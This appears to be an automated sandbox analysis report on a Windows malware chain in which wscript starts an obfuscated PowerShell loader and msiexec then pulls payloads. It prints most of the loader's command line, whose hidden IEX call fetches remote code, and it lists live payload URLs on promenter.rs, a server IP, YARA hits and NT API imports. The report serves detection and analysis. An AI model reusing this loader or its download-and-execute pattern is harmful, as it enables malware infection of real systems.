3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20

Source: powershell.exe, 00000005.00000002.1513698907.000001BDABFBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ma
Source: powershell.exe, 00000005.00000002.1512078603.000001BDABE34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000005.00000002.1512078603.000001BDABE34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft/pkirl/product
Source: powershell.exe, 00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1485319278.000001BD956A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://promenter.rs
Source: powershell.exe, 00000005.00000002.1485319278.000001BD93911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1663709483.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1692631660.00000000075DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1485319278.000001BD93911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1663709483.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1485319278.000001BD944E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.1485319278.000001BD93B36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1485319278.000001BD94F5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs
Source: powershell.exe, 00000005.00000002.1485319278.000001BD93B36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs/Dipodid.pfmP
Source: powershell.exe, 00000007.00000002.1663709483.0000000004BF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs/Dipodid.pfmXRyl
Source: msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs/XWpZCkLt231.bin
Source: msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs/XWpZCkLt231.binH
Source: msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs/XWpZCkLt231.binI
Source: msiexec.exe, 0000000A.00000002.2189354593.00000000088BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://promenter.rs/XWpZCkLt231.binP

Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443

Source: unknown	HTTPS traffic detected: 77.105.36.128:443 -> 192.168.2.9:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.105.36.128:443 -> 192.168.2.9:49973 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_8040.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7816, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDi	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E35C0 NtCreateMutant,LdrInitializeThunk,	10_2_243E35C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_243E2C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_243E2DF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E4650 NtSuspendThread,	10_2_243E4650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E3010 NtOpenDirectoryObject,	10_2_243E3010
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E3090 NtSetValueKey,	10_2_243E3090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E4340 NtSetContextThread,	10_2_243E4340
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2C00 NtQueryInformationProcess,	10_2_243E2C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2C60 NtCreateKey,	10_2_243E2C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2CA0 NtQueryInformationToken,	10_2_243E2CA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2CF0 NtOpenProcess,	10_2_243E2CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2CC0 NtQueryVirtualMemory,	10_2_243E2CC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2D30 NtUnmapViewOfSection,	10_2_243E2D30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E3D10 NtOpenProcessToken,	10_2_243E3D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2D10 NtMapViewOfSection,	10_2_243E2D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2D00 NtSetInformationFile,	10_2_243E2D00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E3D70 NtOpenThread,	10_2_243E3D70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2DB0 NtEnumerateKey,	10_2_243E2DB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2DD0 NtDelayExecution,	10_2_243E2DD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2E30 NtWriteVirtualMemory,	10_2_243E2E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2EA0 NtAdjustPrivilegesToken,	10_2_243E2EA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2E80 NtReadVirtualMemory,	10_2_243E2E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2EE0 NtQueueApcThread,	10_2_243E2EE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2F30 NtCreateSection,	10_2_243E2F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2F60 NtCreateProcessEx,	10_2_243E2F60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2FB0 NtResumeThread,	10_2_243E2FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2FA0 NtQuerySection,	10_2_243E2FA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2F90 NtProtectVirtualMemory,	10_2_243E2F90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2FE0 NtCreateFile,	10_2_243E2FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E39B0 NtGetContextThread,	10_2_243E39B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2AB0 NtWaitForSingleObject,	10_2_243E2AB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2AF0 NtWriteFile,	10_2_243E2AF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2AD0 NtReadFile,	10_2_243E2AD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2B60 NtClose,	10_2_243E2B60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2BA0 NtEnumerateValueKey,	10_2_243E2BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2B80 NtQueryInformationFile,	10_2_243E2B80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2BF0 NtAllocateVirtualMemory,	10_2_243E2BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E2BE0 NtQueryValueKey,	10_2_243E2BE0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C2C022	5_2_00007FF886C2C022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C2B2BB	5_2_00007FF886C2B2BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886C2ADC0	5_2_00007FF886C2ADC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886CFA3BA	5_2_00007FF886CFA3BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A2F340	7_2_04A2F340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A2FC10	7_2_04A2FC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04A2EFF8	7_2_04A2EFF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A1460	10_2_243A1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446F43F	10_2_2446F43F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2445E4F6	10_2_2445E4F6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B0535	10_2_243B0535
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24467571	10_2_24467571
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24470591	10_2_24470591
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2444D5B0	10_2_2444D5B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244616CC	10_2_244616CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CC6E0	10_2_243CC6E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B0770	10_2_243B0770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D4750	10_2_243D4750
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446F7B0	10_2_2446F7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243AC7C0	10_2_243AC7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2445F0CC	10_2_2445F0CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446F0E0	10_2_2446F0E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244670E9	10_2_244670E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2447B16B	10_2_2447B16B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A0100	10_2_243A0100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439F172	10_2_2439F172
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243E516C	10_2_243E516C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244681CC	10_2_244681CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BB1B0	10_2_243BB1B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244701AA	10_2_244701AA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24450274	10_2_24450274
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B52A0	10_2_243B52A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CB2C0	10_2_243CB2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446A352	10_2_2446A352
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446132D	10_2_2446132D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439D34C	10_2_2439D34C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244703E6	10_2_244703E6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243F739A	10_2_243F739A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BE3F0	10_2_243BE3F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B0C00	10_2_243B0C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24429C32	10_2_24429C32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446FCF2	10_2_2446FCF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A0CF2	10_2_243A0CF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24450CB5	10_2_24450CB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24461D5A	10_2_24461D5A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24467D73	10_2_24467D73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BAD00	10_2_243BAD00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243C8DBF	10_2_243C8DBF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243AADE0	10_2_243AADE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CFDC0	10_2_243CFDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446EE26	10_2_2446EE26
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B0E59	10_2_243B0E59
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B9EB0	10_2_243B9EB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446EEDB	10_2_2446EEDB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243C2E90	10_2_243C2E90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446CE93	10_2_2446CE93
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24424F40	10_2_24424F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D0F30	10_2_243D0F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243F2F28	10_2_243F2F28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446FF09	10_2_2446FF09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B1F92	10_2_243B1F92
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BCFE0	10_2_243BCFE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A2FC8	10_2_243A2FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446FFB1	10_2_2446FFB1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2445C87C	10_2_2445C87C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2441D800	10_2_2441D800
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BA840	10_2_243BA840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B2840	10_2_243B2840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243968B8	10_2_243968B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE8F0	10_2_243DE8F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B38E0	10_2_243B38E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243C6962	10_2_243C6962
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B9950	10_2_243B9950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CB950	10_2_243CB950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243B29A0	10_2_243B29A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24467A46	10_2_24467A46
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446FA49	10_2_2446FA49
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24423A6C	10_2_24423A6C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2445DAC6	10_2_2445DAC6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243F5AA0	10_2_243F5AA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243AEA80	10_2_243AEA80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2444DAAC	10_2_2444DAAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446AB40	10_2_2446AB40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2446FB76	10_2_2446FB76
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_24466BD7	10_2_24466BD7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CFB80	10_2_243CFB80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243EDBF9	10_2_243EDBF9
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C591F3	14_2_00C591F3
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C83991	14_2_00C83991
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C6D2F1	14_2_00C6D2F1
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C64B91	14_2_00C64B91
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C69C91	14_2_00C69C91
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C64DB1	14_2_00C64DB1
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C6B531	14_2_00C6B531
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C62E31	14_2_00C62E31
Source: C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe	Code function: 14_2_00C62F75	14_2_00C62F75

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 243E5130 appears 36 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 2441EA12 appears 80 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 2442F290 appears 103 times
